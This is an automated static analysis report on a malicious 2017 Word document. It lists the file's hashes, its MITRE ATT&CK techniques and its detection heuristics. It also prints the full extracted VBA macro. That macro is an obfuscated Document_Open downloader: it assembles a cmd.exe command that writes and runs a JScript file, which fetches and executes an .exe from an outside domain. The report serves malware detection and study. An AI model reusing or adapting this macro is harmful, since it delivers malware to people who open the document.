Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a39c4644498a47f8…

MALICIOUS

Office (OLE)

41.0 KB Created: 2017-03-14 06:37:00 Authoring application: Microsoft Office Word First seen: 2017-03-27
MD5: dd1a73ea9ada094b31bc6b26aab8f96c SHA-1: 2a65902ee6baa22b77e1f199e8618ff1636b0404 SHA-256: a39c4644498a47f8858f91a340c6b07eec22ef000a70dcafd1a25600321dbc64
250 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.003 Windows Command Shell

The file contains VBA macros, including a Document_Open macro, which is a common technique for initial execution. Heuristics indicate suspicious cmd.exe invocation and potential shell calls within the VBA code. The Document_Open macro attempts to construct and execute a command using cmd.exe, strongly suggesting it's designed to download and run a secondary payload.

Heuristics 8

  • ClamAV: Doc.Macro.Obfuscation-6394109-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Obfuscation-6394109-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    ogdurr = Join(yhynt, "")
Shell ogdurr, vqamexwa
End If
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
    Matched line in script
    izesz2 = Array(NaN, "jqkrac( 2) + ""\\\\\\\\"" + aqoj")
zudra6 = Array(NaN, "cmd.exe /c ""ECh^o^ new Functio")
vefify5 = Array(NaN, "aqojqkrac ysaosyxusu = ""hosyxo")
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
Sub Document_Open()
Dim pycvadhazf
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6618 bytes
SHA-256: 516098b9b831c91001ad0ef2f565187ceef1d4f14701d6124454a5bdb1eda4b3
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
Dim pycvadhazf
Dim tulhahcycp4
Dim ysuxor
Dim exuz
Dim unsado3, vefify5, cijapme, urydpuhfa
Dim whihzemzygt9
Dim svyqol, golax, owcavr0, ihzolc5, ozumt0, mujnimn, rulpe3, yvkyran
Dim ihecabp, omujva1, yqidhy, vroxysgac, vqamexwa, ipumc0
Dim izesz2, qumxufo8, yhtuzzetj, foxub, nqined, akkokdegs, yruztisl0
Dim qgavir3
Dim nnupu4
Dim aluck
Dim yjlopf, plemonris6, tecujja, czyke, orimunma, nepobpo5, yhyrxar0, xpulowowk, vvomby5, dqoduzk6, bifemnenh5
Dim petiquh, ifyki7, zudra6, amvupzatv0, safysvo, fwebejx6, ultuvcad, ojewny7, jmadcasb, tukolasd9, ktemma
Dim nsugoji0
Dim jetohecp
Dim qgiztexc7
Dim vumazysv6
Dim shizybryr7, uszinyzxa8, iktivevw6, obicg1, vekpiwrapq6, unitxord
Dim ujzasju8
Dim yzgerydha0
Dim ozed
Dim embykihko, gaxzaqe5, cagid4, adwade9, epotky1, azqenv, yjyrwikh, elytn
Dim ibcec
Dim evoxn1
dqoduzk6 = Array(NaN, "ypaqojq = 1;ycnuqymqiosyxaqojq")
amvupzatv0 = Array(NaN, "ojqyrufjyysosyxaqojqmObjaqojqc")
izesz2 = Array(NaN, "jqkrac( 2) + ""\\\\\\\\"" + aqoj")
zudra6 = Array(NaN, "cmd.exe /c ""ECh^o^ new Functio")
vefify5 = Array(NaN, "aqojqkrac ysaosyxusu = ""hosyxo")
akkokdegs = Array(NaN, "qiosyxaqojqkrac.Raqojqsponsaqo")
xpulowowk = Array(NaN, "kracun(ijaqyxosyxaqojqkraca, 0")
omujva1 = Array(NaN, "osyxaqojqkracabpubo);ynolaosyx")
nepobpo5 = Array(NaN, "laosyxaqojqkrac jkiklumyxi = """)
urydpuhfa = Array(NaN, "rufjyosyxosyxaqojqkracaqojqam""")
qgavir3 = Array(NaN, "ycosyxaqojqkraciposyxing.Filaq")
rulpe3 = Array(NaN, "qojqkrac ycnuqymqiosyxaqojqkra")
vqamexwa = 0
unsado3 = Array(NaN, "jq(""C"");if(osyxypaqojqof ppyxo")
tulhahcycp4 = Array(NaN, " ""cmd.aqojqxaqojq /c "" + osyxm")
ultuvcad = Array(NaN, "dulybz = naqojqw febkuxjcosyxi")
pycvadhazf = Array(NaN, "FilaqojqyrufjyysosyxaqojqmObja")
vroxysgac = Array(NaN, "syxaqojqkraciosyxaqojq(ycnuqym")
bifemnenh5 = Array(NaN, "om/zzz.aqojqxaqojq"";ynolaosyxa")
unitxord = Array(NaN, "qojqXObjaqojqcosyx (axosypx);y")
vumazysv6 = Array(NaN, "_paosyxh);caqojqynoloosyxbuf.C")
fwebejx6 = Array(NaN, "ojqkracabpubo = ""febkuxjDODB.y")
yjyrwikh = Array(NaN, ");aqojqbzudulybz.daqojqlaqojqo")
ujzasju8 = Array(NaN, "aqojqkraciposyx.yrufjyhaqojqll")
evoxn1 = Array(NaN, "yrufjycosyxaqojqkraciposyxing.")
ihecabp = Array(NaN, "ojqn(""GET"", ysaosyxusu, 0);caq")
embykihko = Array(NaN, "ng"") {ynolaosyxaqojqkrac axosy")
epotky1 = Array(NaN, "qojqkraciposyx.yrufjycosyxaqoj")
orimunma = Array(NaN, "ufjypaqojqcialFoldaqojqosyxaqo")
yhyrxar0 = Array(NaN, "amaqojq();caqojqynoloosyxbuf.T")
yruztisl0 = Array(NaN, "krac.saqojqnd();ynolaosyxaqojq")
qumxufo8 = Array(NaN, ";ynolaosyxaqojqkrac caqojqynol")
mujnimn = Array(NaN, "osyxakibja = aqojqbzudulybz.ga")
nsugoji0 = Array(NaN, "ace(/yrufjy/g, ""S"").replace(/r")
yvkyran = Array(NaN, "laosyxaqojqkrac osyxmp_paosyxh")
nnupu4 = Array(NaN, "p_paosyxh;caqojqynoloosyxbuf.P")
yjlopf = Array(NaN, "px = ""MyrufjyXML2.XMLHTTP"";yno")
iktivevw6 = Array(NaN, ".replace(/febkuxj/g, ""A"").repl")
shizybryr7 = Array(NaN, "osiosyxion = 0;if (ycnuqymqios")
golax = Array(NaN, ")('ynolaosyxaqojqkrac aqojqbzu")
gaxzaqe5 = Array(NaN, ", ""t"").replace(/ynol/g, ""v"").r")
ihzolc5 = Array(NaN, "== 200) {caqojqynoloosyxbuf.Wo")
vvomby5 = Array(NaN, "aqojqXObjaqojqcosyx (jkiklumyx")
ifyki7 = Array(NaN, "syxaqojqFilaqojq(Wyrufjycosyxa")
owcavr0 = Array(NaN, "n ('dezhy', 'var dezhy = dezhy")
safysvo = Array(NaN, "qojqcosyx"";ynolaosyxaqojqkrac ")
cijapme = Array(NaN, "qkraciposyxFullNamaqojq);}}');")
petiquh = Array(NaN, "osyx"");ynolaosyxaqojqkrac ppyx")
yqidhy = Array(NaN, "yxaqojqkrac.yrufjyosyxaosyxus ")
jmadcasb = Array(NaN, "krac pibicyfpy = naqojqw febku")
aluck = Array(NaN, "/tekrac/g, ""r""); eval(dezhy);'")
svyqol = Array(NaN, "xjcosyxiynolaqojqXObjaqojqcosy")
czyke = Array(NaN, "c = naqojqw febkuxjcosyxiynola")
ibcec = Array(NaN, "eplace(/aqojq/g, ""e"").replace(")
vekpiwrapq6 = Array(NaN, "syxakibja.Filaqojqyrufjyysosyx")
qgiztexc7 = Array(NaN, "xukryh/g, "":"").replace(/osyx/g")
adwade9 = Array(NaN, ">IBezZ.jse&cS^CrI^PT.^EXE ^/^/")
plemonris6 = Array(NaN, """;ynolaosyxaqojqkrac shuosyxaq")
whihzemzygt9 = Array(NaN, "fjyaynolaqojqToFilaqojq(osyxmp")
uszinyzxa8 = Array(NaN, "qbzudulybz.GaqojqosyxTaqojqmpN")
ozumt0 = Array(NaN, "losaqojq();pibicyfpy.osyxaqojq")
tukolasd9 = Array(NaN, "b iBezz.jse""")
ojewny7 = Array(NaN, "qojqosyxDosyxaqojqkraciynolaqo")
elytn = Array(NaN, "xiynolaqojqXObjaqojqcosyx (shu")
yhtuzzetj = Array(NaN, " = aqojqbzudulybz.Gaqojqosyxyr")
ipumc0 = Array(NaN, "x (imlyxaqojqynol);ynolaosyxaq")
jetohecp = Array(NaN, "i);ycnuqymqiosyxaqojqkrac.opaq")
exuz = Array(NaN, "syxprxukryh//www.gdyhousingsaq")
cagid4 = Array(NaN, "nolaosyxaqojqkrac aqojqbzuduly")
foxub = Array(NaN, "aqojqm == ""sosyxosyxaqojqkraci")
ysuxor = Array(NaN, "ojqosyxaqojqkracynolicaqojqs.c")
tecujja = Array(NaN, "ynolaqojqXObjaqojqcosyx(""yrufj")
nqined = Array(NaN, "oosyxbuf = naqojqw febkuxjcosy")
ktemma = Array(NaN, "bz = naqojqw febkuxjcosyxiynol")
obicg1 = Array(NaN, "imlyxaqojqynol = ""Wyrufjycosyx")
azqenv = Array(NaN, "jqBody);caqojqynoloosyxbuf.yru")
yzgerydha0 = Array(NaN, "ojqynoloosyxbuf.Opaqojqn();yno")
ozed = Array(NaN, "ojqkrac ijaqyxosyxaqojqkraca =")

If Application.SpecialMode = 0 Then
yhynt = Array(zudra6(1), owcavr0(1), iktivevw6(1), nsugoji0(1), qgiztexc7(1), gaxzaqe5(1), ibcec(1), aluck(1), golax(1), ultuvcad(1), tecujja(1), qgavir3(1), amvupzatv0(1), petiquh(1), mujnimn(1), ojewny7(1), unsado3(1), vekpiwrapq6(1), foxub(1), embykihko(1), yjlopf(1), nepobpo5(1), evoxn1(1), pycvadhazf(1), safysvo(1), obicg1(1), ujzasju8(1), plemonris6(1), fwebejx6(1), urydpuhfa(1), qumxufo8(1), nqined(1), elytn(1), omujva1(1), vefify5(1), exuz(1) _
, ysuxor(1), bifemnenh5(1), rulpe3(1), czyke(1), unitxord(1), cagid4(1), ktemma(1), vvomby5(1), jetohecp(1), ihecabp(1), yzgerydha0(1), yvkyran(1), yhtuzzetj(1), orimunma(1), izesz2(1), uszinyzxa8(1), yhyrxar0(1), dqoduzk6(1), yruztisl0(1), jmadcasb(1), svyqol(1), ipumc0(1), ozed(1), tulhahcycp4(1), nnupu4(1), shizybryr7(1), yqidhy(1), ihzolc5(1), vroxysgac(1), akkokdegs(1), azqenv(1), whihzemzygt9(1), vumazysv6(1), ozumt0(1), xpulowowk(1), yjyrwikh(1) _
, ifyki7(1), epotky1(1), cijapme(1), adwade9(1), tukolasd9(1))

ogdurr = Join(yhynt, "")
Shell ogdurr, vqamexwa
End If
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.